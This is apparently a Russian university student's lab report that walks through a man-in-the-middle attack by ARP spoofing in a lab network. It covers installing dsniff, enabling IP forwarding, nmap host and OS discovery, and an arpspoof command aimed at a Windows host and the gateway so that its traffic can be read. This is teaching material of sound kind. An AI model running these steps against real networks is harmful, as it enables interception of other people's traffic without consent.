# Практическая работа №8 "MITM (Man In The Middle)"
Выполнил студент группы БСБО-04-20: Люцько С.А.
Проверил преподаватель: Садыков Ильдар Венерович
**Москва 2023г.**
---
### Работать будем со следующей топологией:

Организуем атаку MITM посредством ARP-Spoofing.
**ARP-Spoofing** - кибератака типа «человек посередине», базирующаяся на уязвимостях протокола ARP, который используется для определения MAC-адреса сетевого устройства по его IP-адресу. Воспользовавшись дефектами протокола, атакующий может перехватить запрос на поиск хоста и зарегистрировать вместо него свое устройство. В результате злоумышленник сможет перехватывать трафик, отправляемый на этот хост.
### Реализация:
#### Работаем с атакующей машинки (Kali-2022)
Сперва установим binutils, являющуюся зависимостью для утилиты, инструментом которой воспользуемся в дальнейшем:
```
sudo apt update && sudo apt install binutils -y
```

Теперь установим основную утилиту dsniff:
```
sudo apt install dsniff -y
```

Включим маршрутизацию трафика:
```
sudo -i
nano /etc/sysctl.conf
```

Раскомментируем следующий параметр

Применим внесённое изменение:
```
sudo sysctl -p
```

Теперь же узнаем IP-адрес целевой машины.
Посмотрим адреса в локальной сети:
```
sudo -i
nmap -sn 192.168.1.0/24
```

Узнаем наш IP:
```
ip a
```

**IP-адрес Kali-2022:** 192.168.1.107
Просканируем соседний IP-адрес на определение ОС:
```
nmap -O 192.168.1.108
```

Windows.
Оставшийся же:
```
nmap -O 192.168.1.101
```

Linux. Вероятнее всего, это мостовое устройство **Debian-RPi4**.
Получается, перехватывать будем с устройства с **IP-адресом: 192.168.1.106**
Запускаем процесс перехвата:
```
sudo -i
arpspoof -i eth0 -t 192.168.1.106 -r 192.168.1.1
```

**-i** устанавливаем рабочий интерфейс
**-t** устанавливает адрес атакуемого (целевого хоста)
**-r** устанавливается только в паре с **-t** (которых, кстати, может быть несколько), указывает хост, на котором мы собираемся перехватывать пакеты, логичнее всего указывать локальный шлюз (**pfSense: 192.168.1.1**).
Если с **Win-10** зайти, например, в браузер и полазить по сайтам:

То при чтении трафика на интерфейсе перехватывающего устройства (**e0 на Kali-2022**), мы сможем видеть пакеты, адресованные целевому устройству (**Win-10**):
